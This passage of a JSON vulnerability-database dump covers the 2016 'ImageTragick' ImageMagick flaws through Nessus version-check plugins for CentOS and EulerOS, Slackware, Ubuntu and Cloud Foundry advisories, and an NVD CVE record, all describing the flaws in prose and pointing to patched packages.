"AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "title": "CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:ImageMagick", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:ImageMagick-doc", "p-cpe:/a:centos:centos:ImageMagick-c++", "p-cpe:/a:centos:centos:ImageMagick-devel", "p-cpe:/a:centos:centos:ImageMagick-perl", "p-cpe:/a:centos:centos:ImageMagick-c++-devel"], "id": "CENTOS_RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# CentOS Errata and Security Advisory 2016:0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91020);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n\n script_name(english:\"CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d280230\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eefa6faa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:51:40", "description": "According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the\n delegate functionality. A remote attacker could create\n a specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to\n arbitrary execution of shell commands with the\n privileges of the user running the\n application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in\n the way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-05-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ImageMagick-perl", "p-cpe:/a:huawei:euleros:ImageMagick-c++", "p-cpe:/a:huawei:euleros:ImageMagick", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1021.NASL", "href": "https://www.tenable.com/plugins/nessus/99784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99784);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the\n delegate functionality. A remote attacker could create\n a specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to\n arbitrary execution of shell commands with the\n privileges of the user running the\n application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in\n the way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7e626634\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ImageMagick packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ImageMagick-6.7.8.9-13\",\n \"ImageMagick-c++-6.7.8.9-13\",\n \"ImageMagick-perl-6.7.8.9-13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "description": "New imagemagick packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz: Rebuilt.\n This update addresses several security issues in ImageMagick, including:\n Insufficient shell characters filtering allows code execution (CVE-2016-3714)\n Server Side Request Forgery (CVE-2016-3718)\n File deletion (CVE-2016-3715)\n File moving (CVE-2016-3716)\n Local file read (CVE-2016-3717)\n To mitigate these issues, the default policy.xml config file has been\n modified to disable all of the vulnerable coders.\n For more information, see:\n https://imagetragick.com\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/imagemagick-6.9.4_1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\ne78d8825fc122e9411b9bbde341ce8da imagemagick-6.7.7_10-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n20bbb69e3a774f9493b3c87a90692b8f imagemagick-6.7.7_10-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n26aa6ce379628b85df0818b17d5b855d imagemagick-6.8.6_10-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3060644c634984224e448ecd03bd0eb1 imagemagick-6.8.6_10-x86_64-2_slack14.1.txz\n\nSlackware -current package:\n7add4b4c162a9e59ae309ea38430e44e xap/imagemagick-6.9.4_1-i586-1.txz\n\nSlackware x86_64 -current package:\n73a376cb32a9fbf529340982dfdb9b88 xap/imagemagick-6.9.4_1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg imagemagick-6.8.6_10-i486-2_slack14.1.txz", "modified": "2016-05-11T06:33:30", "published": "2016-05-11T06:33:30", "id": "SSA-2016-132-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568", "type": "slackware", "title": "[slackware-security] imagemagick", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-5118"], "description": "Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly \nsanitized untrusted input. A remote attacker could use these issues to \nexecute arbitrary code. These issues are known as \"ImageTragick\". This \nupdate disables problematic coders via the /etc/ImageMagick-6/policy.xml \nconfiguration file. In certain environments the coders may need to be \nmanually re-enabled after making sure that ImageMagick does not process \nuntrusted input. (CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, \nCVE-2016-3717, CVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via \nan image file or filename. A remote attacker could use this issue to \nexecute arbitrary code. (CVE-2016-5118)", "edition": 5, "modified": "2016-06-02T00:00:00", "published": "2016-06-02T00:00:00", "id": "USN-2990-1", "href": "https://ubuntu.com/security/notices/USN-2990-1", "title": "ImageMagick vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:39", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717", "CVE-2016-5118"], "description": "USN-2990-1 ImageMagick vulnerability (a.k.a. ImageTragick)\n\n# \n\nMedium\n\n# Vendor\n\nImagemagick, Canonical Ubuntu\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nNikolay Ermishkin and Stewie discovered that ImageMagick incorrectly sanitized untrusted input. A remote attacker could use these issues to execute arbitrary code. These issues are known as \u2018ImageTragick\u2019. This update disables problematic coders via the /etc/ImageMagick-6/policy.xml configuration file. In certain environments the coders may need to be manually re-enabled after making sure that ImageMagick does not process untrusted input. ([CVE-2016-3714](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3714.html>), [CVE-2016-3715](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3715.html>), [CVE-2016-3716](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3716.html>), [CVE-2016-3717](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3717.html>), [CVE-2016-3718](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3718.html>))\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via an image file or filename. A remote attacker could use this issue to execute arbitrary code. ([CVE-2016-5118](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5118.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.65.0 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.65.0 or later versions \n\n# Credit\n\nStewie, Nikolay Ermishkin, Bob Friesenhahn\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-2990-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3714.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3715.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3716.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3717.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3718.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5118.html>\n", "edition": 5, "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "CFOUNDRY:129B6A9BB5C74D717E5AB861B666605D", "href": "https://www.cloudfoundry.org/blog/usn-2990-1/", "title": "USN-2990-1 ImageMagick vulnerability (a.k.a. ImageTragick) | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:28:06", "description": "The LABEL coder in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allows remote attackers to read arbitrary files via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3717", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3717"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3717", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3717", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, 